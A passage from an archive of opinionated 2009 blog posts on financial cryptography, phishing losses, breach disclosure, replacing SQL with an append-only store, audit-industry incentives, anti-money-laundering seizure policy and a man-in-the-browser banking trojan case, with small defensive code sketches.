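            expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
            if not hmac.compare_digest(tag, expected):
                raise ValueError("MAC check failed")   # reject before touching the ciphertext
            dec = Cipher(algorithms.AES(enc_key), modes.CTR(nonce)).decryptor()
            return dec.update(ct) + dec.finalize()

        # usage: enc_key, mac_key = os.urandom(32), os.urandom(32)

    The point of the hypothesis stands either way: one designer picks one construction and ships it.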

    More at hypotheses on Secure Protocol Design.

    Posted by iang at 09:04 AM | Comments (3) | TrackBack

    December 05, 2009

    Phishing numbers

    From a couple of sources posted by Lynn:

    • A single run only hits 0.0005 percent of users,
    • 1% of customers will follow the phishing links.
    • 0.5% of customers fall for phishing schemes and compromise their online banking information.
    • the monetary losses could range between $2.4 million and $9.4 million annually per one million online banking clients
    • on average ... approximately 832 a year ... reached users' inboxes.
    • costs estimated at up to $9.4 million per year per million users.
    • based on data collected from "3 million e-banking users who are customers of 10 sizeable U.S. and European banks."

    The primary source was a survey run by an anti-phishing software vendor, so caveats apply. Still interesting!
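    As a back-of-envelope cross-check (my own arithmetic, not the survey's), the loss range and the fall-for-it rate imply a per-victim figure:

        # Implied annual loss per compromised account, from the survey's own figures.
        clients = 1_000_000
        fall_rate = 0.005                      # 0.5% of customers compromise their credentials
        victims = clients * fall_rate          # 5,000 victims per million clients
        for total_loss in (2.4e6, 9.4e6):      # the survey's annual loss range per million clients
            print(f"${total_loss:,.0f} total -> ${total_loss / victims:,.0f} per victim per year")

    That works out to roughly $480 to $1,880 per compromised account per year, which at least passes the sniff test.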

    For more meat on the bigger picture, see this article: Ending the PCI Blame Game. Which reads like a compressed version of this blog! Perhaps, finally, the thing that is staring the financial operators in the face has started to hit home, and they are really ready to sound the alarm.

    Posted by iang at 06:35 PM | Comments (1) | TrackBack

    November 26, 2009

    Breaches not disclosed as much as we had hoped

    One of the brief positive spots in the last decade was the California bill requiring breaches of data to be disclosed to affected customers. It took a while, but in 2005 the floodgates opened. Now the FBI reports:

    "Of the thousands of cases that we've investigated, the public knows about a handful," said Shawn Henry, assistant director for the Federal Bureau of Investigation's Cyber Division. "There are million-dollar cases that nobody knows about."

    That seems to point at a super-iceberg. To some extent this is expected, because companies will search out new methods to bypass the intent of the disclosure laws. And also there is the underlying economics. As has been pointed out by many (or perhaps not many but at least me) the reputation damage probably dwarfs the actual or measurable direct losses to the company and its customers.

    Companies that are victims of cybercrime are reluctant to come forward out of fear the publicity will hurt their reputations, scare away customers and hurt profits. Sometimes they don't report the crimes to the FBI at all. In other cases they wait so long that it is tough to track down evidence.

    So, avoidance of disclosure is the strategy for all properly managed companies, because they are required to manage the assets of their shareholders to the best interests of the shareholders. If you want a more dedicated treatment leading to this conclusion, have a look at "the market for silver bullets" paper.

    Meanwhile, the FBI reports that the big companies have improved their security somewhat, so the attackers are turning to smaller companies. And:

    They also target corporate executives and other wealthy public figures who it is relatively easy to pursue using public records. The FBI pursues such cases, though they are rarely made public.

    Huh. And this outstanding coordinated attack:

    A similar approach was used in a scheme that defrauded the Royal Bank of Scotland's (RBS.L: Quote, Profile, Research, Stock Buzz) RBS WorldPay of more than $9 million. A group, which included people from Estonia, Russia and Moldova, has been indicted for compromising the data encryption used by RBS WorldPay, one of the leading payment processing businesses globally.

    The ring was accused of hacking data for payroll debit cards, which enable employees to withdraw their salaries from automated teller machines. More than $9 million was withdrawn in less than 12 hours from more than 2,100 ATMs around the world, the Justice Department has said.

    2,100 ATMs! Worldwide! That leaves that USA gang looking somewhat kindergarten, with only 50 ATMs. No doubt about it, we're now talking serious networked crime, and I'm not referring to the Internet but to the network of collaborating economic agents.

    Compromising the data encryption, even. Anyone know the specs? These are important numbers. Did I miss this story, or does it prove the FBI's point?

    Posted by iang at 01:23 PM | Comments (0) | TrackBack

    November 08, 2009

    my War On SQL

    Around three weeks ago, I had a data disaster. In a surprise attack, 2 weeks' worth of my SQL DATABASE was wiped out. Right after my FIRST weekend demo of some new code. The horror!

    On that Monday morning I went into shell-shock for hours as I tried to trace where the results of the demo -- the very first review of my panzer code -- had disappeared to. By 11:00 there was no answer, and finger-of-blame pointed squarely at some SQL database snafu. The decision was reached to replace the weaponry with tried and trusty blades of all wars previous: flat files, the infantry of data. By the end of the day, the code was written to rebuild the vanguard from its decimated remains, and the next day, work-outs and field exercises proved the results. Two tables entirely replaced, reliably.

    That left the main body, a complex object split across many tables, and the rearguard of various sundry administrative units. It took another week to write the object saving & restoring framework, including streaming, model objects along the lines of MVC for each element, the conversions between them, and unit testing. (I need a name for this portable object pattern. It came from SOX and I didn't think much of it at the time, but it seems nobody else does it.) Then, some days of unit tests, package tests, field tests, and so forth. Finally, 4-5 days of re-working the application to use object database methods, not SQL.

    16 days later, up and going. The army is on the march; SQL is targeted, acquired, destroyed. Defeated, wiped off the map, no longer a blot on the territory of my application. 2 days of mop-up and I'm back to the demo.

    Why go on a holy crusade against SQL? There are several motives for this war:

    • Visibility. Like all databases, SQL is a black box. How exactly do you debug an application sitting on a black box?
    • Visibility #2. When it goes wrong, the caller/user/owner is powerless to fix it. It's a specialist task to even see inside.
    • Generalist. This database is lightweight, indeed it's called SQLite. The point isn't that it is "worse" than the rest, but that it'll have to be replaced one day. Why? All of these things are generalists and cannot cope with narrow, precise requirements. In other words, they look good on the parade ground, but when the shooting starts, the only order is "retreat!"
    • Achilles heel: backups have to be manually created, recovered, and tested on a routine basis. Yet this never gets done, and when the data corrupts, it is too late. Making backups easy is the #1 priority of all databases. Did you know that? Funnily enough, neither did any of the database providers.

    And then there's the interface. Let us not shame the mere technical _casus belli_ above, let us put the evil that is SQL in a section of abomination, all of its own:

    SQL is in the top 5 of the computing world's most awful anachronisms. It's right up there with ASN.1, X.509, LDAP, APL, and other embarrassments to the world of computer science. In this case, there is one reason why SQL stands out like the sideways slice of death of a shamed samurai: data! These things, SQL included, were all designed when data was king, when we all had to bow before the august power of our corporate bytes, while white-suited priests inserted the holy decks and the tapes of glory into bright shining temples of the mainframe of enlightenment.

    But those imperial times are over. The false data-is-god was slain, discarded and buried, in the glorious & bloody revolution of the Object, that heathen neologism that rose up and slew and enslaved data during the early 1980s. Data-only is slain, data is dead. Data is captured, enslaved, owned. It is now objects, objects, objects. Data is an immoral ghost of its former self, when let out from its rightful context of semantic control.

    These are the reasons why I leapt to the field to do battle to the death with the beast that is SQL. My report from the field is as follows:

    • operating from a flat-file data store is slower and faster, depending on the type of action. Direct actions by my code are slower than SQL, but complicated actions are quicker. Overall, we are talking 10 - 50ms, so it is all in the "whatever" rating.
    • Code overall is dramatically simpler. There is no need to emasculate the soul of ones object model. Simply store the object, and get back to the fight. The structure of the code, the design, is simplified as the inherently senseless interface of OO to SQL is gone, it is now more OO, more top-to-bottom.
    • Joins have to be done in main code. This is an advantage for the coder, because the coder knows the main code, and the main language.
    • debugging is much easier because the data can be read, those times that is necessary, and the data can be seen, which is necessary all the time.
    • object transactions are trivial. Cross-object transactions are tricky. This forces the general in the field to be much more balanced.
    • no data is ever lost. At least, in my design, it can't be lost by action of the code, as everything is append-only (a toy sketch of the append-only idea follows this list).
    • it uses about 5 times more space on the battlefield of your diskspace. Another "whatever..."
    • The code length is about the same. What was additionally required in database code (1kloc) was taken away in awfully complicated SQL interfacing code that melted away. The "Model" code, that is, the objects to be saved is an additional 1kloc, but required anyway for clean OO design.
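    For the curious, the append-only idea mentioned above can be as simple as one record per line, newest record wins. This is a toy sketch of my own, nothing like the actual code, with hypothetical names:

        import json, os

        class AppendOnlyStore:
            # Toy append-only object store: one JSON record per line, latest record for an id wins.
            def __init__(self, path):
                self.path = path

            def save(self, obj_id, obj):
                with open(self.path, "a") as f:        # append-only: nothing is ever overwritten
                    f.write(json.dumps({"id": obj_id, "data": obj}) + "\n")
                    f.flush()
                    os.fsync(f.fileno())

            def load(self, obj_id):
                latest = None
                if os.path.exists(self.path):
                    with open(self.path) as f:
                        for line in f:                  # replay history; the last record wins
                            rec = json.loads(line)
                            if rec["id"] == obj_id:
                                latest = rec["data"]
                return latest

        # usage: store = AppendOnlyStore("payments.log"); store.save("tx1", {"amount": 10})

    Reading is a linear replay, which is exactly the visibility and debuggability argued for above; indexing and cross-object transactions are where the real work lives.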

    I continue to mop up. What's the bottom line? Control. The application controls the objects and the objects control their data.

    So what went wrong with SQL? Fundamentally, it was designed in a day when data was seriously different. Those days are gone; now data is integrally related to code. It's called "object oriented" and even if you don't do it, it is being done to you. The object owns the data, not the database. Data seen naked is an abomination, and SQL is just rags on a beast; it's still a beast.

    Sadly, the world is still a decade or two away from this. And, to be fair, hattip to Jeroen van Gelderen for the OO database he designed and built for Webfunds. Using that was a lesson in how much of a delight it was to be OO all the way down to the disk-byte.

    Posted by iang at 02:53 AM | Comments (9) | TrackBack

    November 07, 2009

    The War on Drugs moves to endgame: the War on US Americans

    The decision to conduct a war on drugs was inevitably a decision to hollow-out Mexico. The notion of hollowing-out states is a time-honoured tradition in the Great Game, the way you control remote and wild places. The essential strategy is that you remove the institutions that keep places strong and stable, and bring them to a chaos which then keeps the countries fighting each other.

    While they fight each other they are easier to control and extract value from. This is the favourite conspiracy theory behind the middle east and the famous Kissinger Deal: The Sheiks are propped up and given control of weak states as long as they trade their oil in dollars, and use the money to buy American goods. Of course we only speculate these details, and sometimes things look a little loose.

    There are weaknesses in the strategy. Obviously, we are playing with fire when hollowing out a state ... so there is quite a lot of danger to the nearby states. (Which of course leads to the next part of the strategy, to play fire against fire and undermine an entire region.)

    Which brings us to the War on Drugs and the decision to place Mexico into the role of hollowed-out state. John Robb points to this article:

    Beheadings and amputations. Iraqi-style brutality, bribery, extortion, kidnapping, and murder. More than 7,200 dead-almost double last year's tally-in shoot-outs between federales and often better-armed drug cartels. This is modern Mexico, whose president, Felipe Calderón, has been struggling since 2006 to wrest his country from the grip of four powerful cartels and their estimated 100,000 foot soldiers.

    So, quite obviously, if one understands the strategy, don't do this nearby. Do it far away. Reagan's famous decision to do this must have been taken on one of his less memorable days ... no matter how the decision was taken on Mexico, now Reagan's chickens have crossed the border to roost in mainland USA:

    But chillingly, there are signs that one of the worst features of Mexico's war on drugs - law enforcement officials on the take from drug lords - is becoming an American problem as well. Most press accounts focus on the drug-related violence that has migrated north into the United States. Far less widely reported is the infiltration and corruption of American law enforcement, according to Robert Killebrew, a retired U.S. Army colonel and senior fellow at the Washington-based Center for a New American Security. "This is a national security problem that does not yet have a name," he wrote last fall in The National Strategy Forum Review. The drug lords, he tells me, are seeking to "hollow out our institutions, just as they have in Mexico."

    Quite what is going on in these people's minds is unclear to me. The notion that it "has no name" is weird: it's the standard strategy with the standard caveat. They overdid the prescription, and now the disease bounces back stronger, more immune, with a vengeance! Further, I don't actually think it is possible to ascribe this to a deliberate plot by the Mexican drug lords, because it is already present in the USA:

    Experts disagree about how deep this rot runs. Some try to downplay the phenomenon, dismissing the law enforcement officials who have succumbed to bribes or intimidation from the drug cartels as a few bad apples. Peter Nuñez, a former U.S. attorney who lectures at the University of San Diego, says he does not believe that there has been a noticeable surge of cartel-related corruption along the border, partly because the FBI, which has been historically less corrupt than its state and local counterparts, has significantly ratcheted up its presence there. "It's harder to be as corrupt today as locals were in the 1970s, when there wasn't a federal agent around for hundreds of miles," he says.

    But Jason Ackleson, an associate professor of government at New Mexico State University, disagrees. "U.S. Customs and Border Protection is very alert to the problem," he tells me. "Their internal investigations caseload is going up, and there are other cases that are not being publicized." While corruption is not widespread, "if you increase the overall number of law enforcement officers as dramatically as we have" - from 9,000 border agents and inspectors prior to 9/11 to a planned 20,000 by the end of 2009 - "you increase the possibility of corruption due to the larger number of people exposed to it and tempted by it." Note, too, that Drug Enforcement Agency data suggest that Mexican cartels are operating in at least 230 American cities.

    By that I mean, the drug situation has already corrupted large parts of the USA governance structure. I've personally heard of corruption stories in banks, politics, police and as far up the pecking order as FINCEN, intel agencies and other powerful agencies. As an outside observer it looks to me like they've made their peace with the drugs a long time ago, heaven knows what it looks like to a real insider.

    So I see a certain sense of hubris in these writings. It feels to me that the professional journalist did not want to talk about the corruption that has always been there (e.g., how else did the stuff get distributed before?). What seems to be happening is that now that Mexico is labelled in the serious press (*) as hollowed-out, it has become easier to talk about the problem in mainstreet USA, because we can cognitively blame the Mexicans. Indeed, the title of the piece is The Mexicanization of American Law Enforcement:

    And David Shirk, director of the San Diego-based Trans-Border Institute and a political scientist at the University of San Diego, says that recent years have seen an "alarming" increase in the number of Department of Homeland Security personnel being investigated for possible corruption. "The number of cases filed against DHS agents in recent years is in the hundreds," says Shirk. "And that, obviously, is a potentially huge problem." An August 2009 investigation by the Associated Press supports his assessment. Based on records obtained under the Freedom of Information Act, court records, and interviews with sentenced agents, the AP concluded that more than 80 federal, state, and local border-control officials had been convicted of corruption-related crimes since 2007, soon after President Calderón launched his war on the cartels. Over the previous ten months, the AP data showed, 20 Customs and Border Protection agents alone had been charged with a corruption-related crime. If that pace continued, the reporters concluded, "the organization will set a new record for in-house corruption."

    Well, whatever it takes. If the US-Americans have to blame the Mexican-Americans in order to focus on the real problems, that might be the cost of getting to the real solution: the end of Prohibition. Last word to Hayden, no stranger to hubris:

    Michael Hayden, director of the Central Intelligence Agency under President George W. Bush, called the prospect of a narco-state in Mexico one of the gravest threats to American national security, second only to al-Qaida and on par with a nuclear-armed Iran. But the threat to American law enforcement is still often underestimated, say Christesen and other law enforcement officials.

    * Mind you, I do not see how they are going to blame the Mexicans for the hollowing-out of the mainstream press. Perhaps the Canadians?

    Posted by iang at 09:37 AM | Comments (5) | TrackBack

    October 25, 2009

    Audits VI: the wheel spins. Until?

    We've established that Audit isn't doing it for us (I, II, III). And that it had its material part to play in the financial crisis (IV). Or its material non-part (II). I think I've also had a fair shot at explaining why this happened (V).

    I left off last time asking why the audit industry didn't move to correct these things, and especially why it didn't fight Sarbanes-Oxley as being more work for little reward. In posts that came afterwards, thanks to Todd Boyle, it is now clear that the audit industry will not stand in front of anything that allows its own house to grow. The Audit Industry is an insatiable growth machine, and this is its priority. No bad thing if you are an Auditor.

    Which leaves us with a curious question: What then stops the Audit from growing without bound? What force exists to counterbalance the natural tendency of the auditor to increase the complexity, and increase the bills? Can we do SOX-1, SOX-2, SOX-3 and each time increase the cost?

    Those engineers and others familiar with "systems theory" among us will be thinking in terms of feedback: all sustainable systems have positive feedback loops which encourage their growth, and negative feedback loops which stop their growth exploding out of control. In earlier posts, we identified the positive feedback loop of the insider's interest. The question would then be (for the engineers): what is the negative feedback control?

    Wikipedia helpfully suggests that Audit is a feedback control over organisations, but where is the feedback control over Audit? Even accepting the controversial claim that Sarbanes-Oxley delivered better reliability and quality in audits, we do know there must be a point where that quality is too expensive to pay for. So there must be a limit, and we must know when to stop paying.

    And now the audit penny drops: There is no counterbalancing force!

    We already established that the outside world has no view into the audit. Our chartered outsider has taken the keys to the citadel and now owns the innermost sanctums. The insider operates to the standard incentive, which is to improve his own position at the expense of the outsider; and the Auditor is now the insider. Which leads to a compelling desire to increase the size, complexity and fees of Audit.

    Yet the machine of audit growth has no brake, so there is nothing to stop it moving from a useful position of valuable service to society to an excessive position of unsustainable drain on the public welfare. There is nothing to stop Audit consuming the host it parasitises, nor anything that keeps even the old, core part of Audit on the straight and narrow.

    And this is more or less what has happened. That which was useful 30 years ago -- the opinion over financial statements, useful to educated investors -- has migrated well beyond that position into consuming the very core of the body corporate. IT security audits, industry compliance audits, quality audits, consulting engagements, market projects, manufacturing advice, and the rest of it now consume far more than their proper share.

    Many others will point at other effects. But I believe this is at the core of it: the auditor promises a result for outsiders, has taken the insiders' keys and crafted a role of great personal benefit, without any external control. So it follows that it must grow, and it must drift off any useful agenda. And so it has, as we see from the financial crisis.

    Which leads to a rather depressing conclusion: Audit cannot regulate itself. And we can't look to the government to deal with it, because government was part & parcel of our famous financial crisis. Indeed, the agencies have their hands full right now making the financial crisis worse; we hardly want to ask them to fix this mess as well. Today's evidence of agency complicity is just one more item added to a mountain of depression.

    What's left?

    Posted by iang at 08:46 PM | Comments (2) | TrackBack

    October 12, 2009

    How the FATF brought down modern civilisation and sent us all to retire in Mexico

    Nobody likes criminals. Even criminals don't like criminals; they are unfair competition.

    So it is with some satisfaction that our civilisation has worked for a thousand years to suppress the criminal within; going back to the Magna Carta, where the institution of the monarch was first separated from the money-making classes and the criminal classes, both. Over time, this genesis was developed to create the rights of the people to hold assets, and to establish the government as firmly oriented to defending those rights.

    One of those hallowed principles was that of consolidated revenue. This boring, dusty old thing was a foundation for honest government because it stopped any particular agency from becoming a profitable affair. That is, no longer government for the people, but one of the money making or money stealing classes mentioned above.

    Consolidated Revenue is really simple: all monies collected go to the Treasury and are from there distributed according to the budget process. Hence, all monies collected, for whatever purpose, are done so on a policy basis, and are checked by the entire organisation. If you have Budget Day in your country, that means the entire electorate. Which latter, if unhappy, throws the whole sorry group out on the streets every electoral cycle, and puts an entirely new group in to manage the people's money.

    This simple rule separates the government from the profit-making classes and the criminal classes. Break it at your peril.

    Which brings us to the FATF, the rot within modern civilisation. This Paris-based body with the soft and safe title of "Financial Action Task Force" deals with something called money laundering. Technically, money laundering exists and there is little dispute about this; criminals need a way to turn their ill-gotten gains into profit. When criminals get big, they need to turn a lot of bad money into good money. So part of the game for the big boys was to set up large businesses that could wash a lot of money. It is called laundering, and washing, because the first large-scale money-cleansing businesses were laundries or launderettes: shops with coin-operated washing machines, which took lots and lots of cash, in a more or less invisible fashion. Etc etc, this is all well known, undisputed, a history full of colour.

    What is much more disputable is how to deal with it. And this is where the FATF took us on the rather short path to a long stay in hell. Their prescription was simple: seize the money, and keep it. It is indeed as simple as the law of Consolidated Revenue. Which they then proceeded to break, as well, in their innocence and goodliness.

    The Economist reports on how far Britain, a leader in this race to disaster, has come in the 30 short years it has taken to unravel centuries of governance:

    The public sale of criminals' property, usually through auction houses or salvage merchants, has been big business for a long time. The goods are those that crooks have acquired legitimately but with dirty money, as opposed to actual stolen property, which the police must try to reunite with its rightful owners. Half the proceeds go to the Home Office, and the rest to the police, prosecutors and courts. The bigger police forces cream off millions of pounds a year in this way (see chart).

    So if a crook steals goods, the police work for the victim. But if a crook makes money by any other means, the police no longer work for the victim, but for themselves. We now have the Home Office, the prosecutors, the courts, and the humble British Bobby well incentivised to promote money laundering in all its guises. Note that the profit margin in this business is *well in excess of standard business rates of return*, so we should have no surprise at all that the business of legal money laundering is booming:

    Powers to confiscate criminals' ill-gotten gains have grown steadily. A drugs case in 1978, in which the courts were unable to strip the traffickers of £750,000 of profits, caused Parliament to pass asset-seizure laws that applied first to drug dealers, and then more widely. The 2002 Proceeds of Crime Act expanded these powers greatly, allowing courts to seize more or less anything owned by a convict deemed to have a "criminal lifestyle", and introducing a power of civil recovery, whereby assets may be confiscated through the civil courts even if their owner has not been convicted of a crime.

    Everyone's happy with that of course! (Read the last two paragraphs for a good, honest middle-class belly laugh.) Of course, the normal argument is that the police are the good guys, and they do the right thing. And if you oppose them, you must be a criminal! Or, you like criminals or benefit from criminals or in some way, you are dirty like a criminal.

    And such it is. This is the sort of thought level that characterizes the discussion, and is frequently brought up by supporters of the money laundering programmes. It's also remarkably similar to the rhetoric leading up to most bad wars (who said "you're either with us or against us?"), pogroms and other crimes against civilisation.

    Serious students of economics and society can do better. Let's follow the money:

    Since then, police cupboards have filled up fast. Confiscations of criminal proceeds in 2001-02 amounted to just £25m; in 2007-08 they were £136m, and the Home Office has set a goal of £250m for the current financial year. To meet this, new powers are planned: a bill before parliament would allow property to be seized from people who have been arrested but not yet charged, though it would still not be sold until conviction. This, police hope, will prevent criminals from disposing of their assets during the trial.

    This is the standard evolution of a new product cycle in profitable business. First, mine the easy gold that is right there in front of you. Next, develop variations to increase revenues. Third, institute good management techniques to reduce wastage. The Home Office is setting planning targets for profit raising, and searching for more revenue. The government has burst its chains of public service, is muckraking with the rest of the dirty money-grubbing corporates, and is now locked in a deadly embrace of profitability with the dirty criminal classes.

    All because the legislature forgot the fundamental laws of governance!

    Can the British electorate possibly reel in this insatiable tiger, now they've incentivised it to chase and seize profit? Probably not. But, "surely that doesn't matter," cry the middle-class masses, safe in their suburban homes? Surely the police would never cross the NEXT line and become the criminals, seizing money and assets that were not ill-gotten?

    Don't be so sure. There is enough anecdotal evidence in the USA (1) that this is routine and regular. And unchallenged. It will happen in Britain, and if it goes unchallenged, the next step will become institutionalised: deliberate targeting of quasi-criminal behaviour for revenue-raising purposes. Perhaps you've already seen it: are speeding fines collected on wide open motorways, or in danger spots?

    The FATF have broken the laws of civilisation, and now we are at the point where the evidence of the profit-making police-not-yet-gang is before us. The Economist's article is nearly sarcastic .. uncomfortable with this immoral behaviour, but not yet daring to name the wash within Whitehall. Reading between the lines of that article, it is both admiring of the management potential of the Home Office (should we advise them to get an MBA?), and deeply disgusted. As only an economist can be, when it sees the road to hell.

    Britain stands at the cusp. What do we see when we look down?

    We see Mexico, the country that Ronald Reagan hollowed out. That late great President of the USA had one massive black mark on his career, which is a cross for us all to bear, now that he's skipped off to heaven.

    Ronald Reagan created the War on Drugs, which was America's part in the FATF alliance. It was called "War" for marketing reasons: nobody criticises the patriotic warriors, nobody dare challenge their excesses. This was another stupidity, another breach of the natural laws of civilisation (separation of powers, or in the USA, this might be better known as the destruction of the Posse Comitatus Act). This process took the "War" down south of the border, and turned the Mexican political parties, judiciary, police force and other powerful institutions into victims of Ronald Reagan's "War". From a police perspective, Mexico was already hollowed out last decade; what we are seeing in the current decade is the hollowing out of the Army. The carving up of battalions and divisions into the various gangs that control the flow of hot-demand items from the poor south to the rich north of the Americas.


    When considering these issues, and our Future in Mexico, there are several choices.

    The really sensible one would be to shut down the FATF and its entire disastrous experiment. Tar & feather anyone involved with them, run them out of town backwards on a donkey, preferably to a remote spot in the Pacific, with or without a speck of land. The FATF are irreparable, convinced that they are the good guys, and can do no wrong. But politically, this is unlikely, because it would damn the politicians of a generation for adopting childish logic while on duty before the public. And the FATF's influence runs deep within the regulatory and financial structure; everyone will be reminded that "you backed us then, you don't want people to think you're wrong..." Nobody will admit the failure, nobody will say «¡Discúlpanos!» ("forgive us") to the Mexican pueblo for depriving them of honest policing and a civilised life.

    The simple choice is to go back to our civilised roots and impose the principle of Consolidated Revenue back into law. In this model, the Home Office should have its business permit taken away from it, and budget control restored. The Leicestershire Constabulary should be raided by the Treasury and have its eBay and Paypal accounts seized, like any other financial misfit. This is the Al Capone solution, which nobody is comfortable with, because it admits we can't deal with the problem properly. But it does seem to be the only practical solution of a very bad lot.

    Or we choose to go to Mexico. Step by step, slowly but in our lifetimes. It took 20 years to hollow out Mexico; we have a bit longer in other countries, because the institutions are staffed by stiffer, better educated people.

    But not that long. That is the thing about the natural laws: breach them, and the policing power of the economy will come down on you eventually. The margins on the business of sharing out ill-gotten gains are way stronger than any principled approach to policing or governance can deal with. I'd give it another 20 years for Britain to get to where Mexico is now.


    Posted by iang at 09:01 AM | Comments (4) | TrackBack

    October 01, 2009

    Man-in-the-Browser goes to court

    Stephen Mason reports that MITB is in court:

    A gang of internet fraudsters used a sophisticated virus to con members of the public into parting with their banking details and stealing £600,000, a court heard today.

    Once the 'malicious software' had infected their computers, it waited until users logged on to their accounts, checked there was enough money in them and then insinuated itself into cash transfer procedures.

    (also on El Reg.) This breaches the 2-factor authentication system commonly in use because (a) the trojan controls the user's PC, and (b) the authentication scheme that was commonly pushed out over the last decade or so only authenticates the user, not the transaction. As the trojan now controls the PC, it effectively is the user. And the real user happily authenticates himself, and the trojan, and the trojan's transactions, and even lies about it!

    Numbers, more than ordinarily reliable because they have been heard in court:

    'In fact as a result of this Trojan virus fraud very many people - 138 customers - were affected in this way with some £600,000 being fraudulently transferred.

    'Some of that money, £140,000, was recouped by NatWest after they became aware of this scam.'

    This is called Man-in-the-browser, which is a subtle reference to SSL's vaunted protection against the Man-in-the-middle. Unfortunately several things went wrong in this area of security: Adi's 3rd law of security says the attacker always bypasses; one of my unnumbered aphorisms has it that the node is always the threat, never the wire; and finally, the extraordinary success of SSL in the mindspace war blocked any attempt to fix the essential problems. SSL is so secure that nobody dare challenge browser security.

    The MITB was first reported in March 2006 and sent a wave of fear through the leading European banks. If customers lost trust in online banking, this would turn their support / branch employment numbers on their heads. So they rapidly (for banks) developed a counter-attack by moving their confirmation process over to the SMS channel of users' phones. The Man-in-the-browser cannot leap across that air-gap, and so the MITB is more or less defeated.
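
    To see why the air-gap works, here is a minimal sketch -- my own illustration, not any bank's actual system, and the account, payee and amount are made up -- of confirmation over a second channel. The one-time code is derived from the transaction the bank actually received and is delivered together with those details over SMS; a trojan can rewrite what the browser shows, but not what arrives on the phone.

        # Sketch of out-of-band transaction confirmation (illustrative only).
        import hmac, hashlib, secrets

        BANK_KEY = secrets.token_bytes(32)          # held only by the bank

        def issue_confirmation(account, payee, amount_cents):
            """Bank side: derive a short one-time code bound to the transaction details."""
            msg = f"{account}|{payee}|{amount_cents}".encode()
            code = hmac.new(BANK_KEY, msg, hashlib.sha256).hexdigest()[:6]
            sms = f"Confirm payment of {amount_cents / 100:.2f} to {payee} with code {code}"
            return code, sms

        def verify_confirmation(account, payee, amount_cents, code_entered):
            """Bank side: the code only verifies against the details the bank holds."""
            expected, _ = issue_confirmation(account, payee, amount_cents)
            return hmac.compare_digest(expected, code_entered)

        # The trojan silently rewrote the payee inside the browser session...
        code, sms = issue_confirmation("12345678", "Mule Account Ltd", 857_600)
        print(sms)   # ...but the phone shows the real destination and amount.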

    European banks tend to be proactive when it comes to security, and hence their losses are minuscule. Reported recently was something like €400k for a smaller country (7 million?) for an entire year for all banks. This one case in the UK is double that, reflecting that British banks and USA banks are reactive to security. Although they knew about it, they ignored it.

    This could be called the "prove-it" school of security, and it has merit. As we saw with SSL, there never really was much of a threat on the wire; and when it came to the node, we were pretty much defenceless (although a lot of that comes down to one factor: Microsoft Windows). So when faced with FUD from the crypto / security industry, it is very, very hard to separate real dangers from made-up ones. I felt it was serious; others thought I was spreading FUD! Hence Philipp Gühring's paper Concepts against Man-in-the-Browser Attacks, and the episode formed fascinating evidence for the market for silver bullets. The concept is now proven right in practice, but it didn't turn out how we predicted.

    What is also interesting is that we now have a good cycle timeline: March 2006 is when the threat first crossed our radars. September 2009 it is in the British courts.

    Postscript. More numbers from today's MITB:

    A next-generation Trojan recently discovered pilfering online bank accounts around the world kicks it up a notch by avoiding any behavior that would trigger a fraud alert and forging the victim's bank statement to cover its tracks.

    The so-called URLZone Trojan doesn't just dupe users into giving up their online banking credentials like most banking Trojans do: Instead, it calls back to its command and control server for specific instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send it the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction.

    Researchers from Finjan found the sophisticated attack, in which the cybercriminals stole around 200,000 euro per day during a period of 22 days in August from several online European bank customers, many of whom were based in Germany....

    "The Trojan was smart enough to be able to look at the [victim's] bank balance," says Yuval Ben-Itzhak, CTO of Finjan... Finjan found the attackers had lured about 90,000 potential victims to their sites, and successfully infected about 6,400 of them. ...URLZone ensures the transactions are subtle: "The balance must be positive, and they set a minimum and maximum amount" based on the victim's balance, Ben-Itzhak says. That ensures the bank's anti-fraud system doesn't trigger an alert, he says.

    And the malware is making the decisions -- and alterations to the bank statement -- in real time, he says. In one case, the attackers stole 8,576 euro, but the Trojan forged a screen that showed the transferred amount as 53.94 euro. The only way the victim would discover the discrepancy is if he logged into his account from an uninfected machine.

    Posted by iang at 09:26 AM | Comments (1) | TrackBack

    September 14, 2009

    Audits V: Why did this happen to us ;-(

    To summarise previous posts, what do we know? We know so far that the hallowed financial Audit doesn't seem to pick up impending financial disaster, on either a micro-level like Madoff (I) or a macro-level like the financial crisis (II). We also know we don't know anything about it (III), trying harder didn't work (II), and in all probability the problem with Audit is systemic (IV). That is, likely all of them, the system of Audits, not any particular one. The financial crisis tells us that.

    Notwithstanding its great brand, Audit does not deliver. How could this happen? Why did our glowing vision of Audit turn out to be our worst nightmare? Global financial collapse, trillions lost, entire economies wallowing in the mud and slime of bankruptcy shame?

    Let me establish the answer to this by means of several claims.

    First, complexity. Consider what audit firm Ernst & Young told us a while back:

    The economic crisis has exposed inherent weaknesses in the risk management practices of banks, but few have a well-defined vision of how to tackle the problems, according to a study by Ernst & Young.

    Of 48 senior executives from 36 major banks around the world questioned by Ernst & Young, just 14% say they have a consolidated view of risk across their organisation. Organisational silos, decentralisation of resources and decision-making, inadequate forecasting, and lack of transparent reporting were all cited as major barriers to effective enterprise-wide risk management.

    The point highlighted above is this: This situation is complex! In essence, the process is too complex for anyone to appreciate from the outside. I don't think this point is so controversial, but the next are.

    My second claim is that in any situation, stakeholders work to improve their own position. To see this, think about the stakeholders you work with. Examine every decision that they take. In general, every decision that reduces the benefit to them will be fiercely resisted, and any decision that increases the benefit to them will be fiercely supported. Consider what competing audit firm KPMG says:

    A new study put out by KPMG, an audit, tax and advisory firm said that pressure to do "whatever it takes" to achieve business goals continues as the primary driver behind corporate fraud and misconduct.

    Of more than 5,000 U.S. workers polled this summer, 74 percent said they had personally observed misconduct within their organizations during the prior 12 months, unchanged from the level reported by KPMG survey respondents in 2005. Roughly half (46 percent) of respondents reported that what they observed "could cause a significant loss of public trust if discovered," a figure that rises to 60 percent among employees working in the banking and finance industry.

    This is human nature, right? It happens, and it happens more than we like to admit. I suggest it is the core and prime influence, and won't bother to argue it further, although if you are unsatisfied with this claim, I suggest you read Lewis on The End (warning: it's long).

    As we are dealing with complexity, even insiders will not find it easy to identify the nominal, original benefit to end-users. And, if the insiders can't identify the benefit, they can't put it above their own benefit. Claims one and two, added together, give us claim three: over time, all the benefit will be transferred from the end-users to the insiders. Inevitably. And, it is done naturally, subconsciously and legally.

    What does this mean to Audits? Well, Auditors cannot change this situation. If anything, they might make it worse. Consider these issues:

    • the Auditor is retained by the company,
    • to investigate a company secret,
    • the examination, the notes, the results and concerns are all secret,
